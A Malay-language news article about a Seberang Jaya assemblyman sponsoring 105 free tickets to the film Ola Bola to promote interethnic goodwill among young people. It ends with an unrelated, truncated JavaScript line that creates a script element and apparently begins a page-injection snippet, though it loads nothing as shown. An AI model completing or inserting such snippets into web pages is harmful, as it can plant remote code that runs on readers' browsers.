Taja 105 tiket Ola Bola, tarik anak muda hayati muhibah kaum

SEBERANG JAYA – Tak sampai dua jam diiklankan di media sosial, habis 105 tiket filem Ola Bola yang ditaja oleh Ahli Dewan Undangan Negeri (ADUN) Seberang Jaya, Dr. Afif Bahardin.

Afif memberitahu, semangat muhibah pada zaman kegemilangan pasukan bola sepak kebangsaan Malaysia dahulu hingga berjaya memasuki Sukan Olimpik Moscow 1980 diharap mampu menghakis sentimen perkauman dalam kalangan generasi anak muda hari ini.

“Pendekatan ini mungkin akan diteruskan lagi di masa akan datang, memandangkan sambutan yang diterima adalah amat menggalakkan.

“Ini kerana, tidak sampai dua jam diiklankan di media sosial, pendaftaran untuk tiket percuma telah penuh,” responsnya sebelum tayangan filem tersebut di sini baru-baru ini.

Ola Bola merupakan sebuah filem bertemakan sukan arahan Chiu Keng Guan dan dibintangi JC Chee, Luqman Hafidz, Saran Kumar Manokaran, Marianne Tan, Katrina Ho, Bront Palarae, Taufiq Hanafi dan Frankie Lee.

Filem tempatan tersebut berjaya memperoleh kutipan tertinggi bagi tahun 2016 iaitu direkodkan kira-kira RM12 juta.

var d=document;var s=d.createElement(‘script’);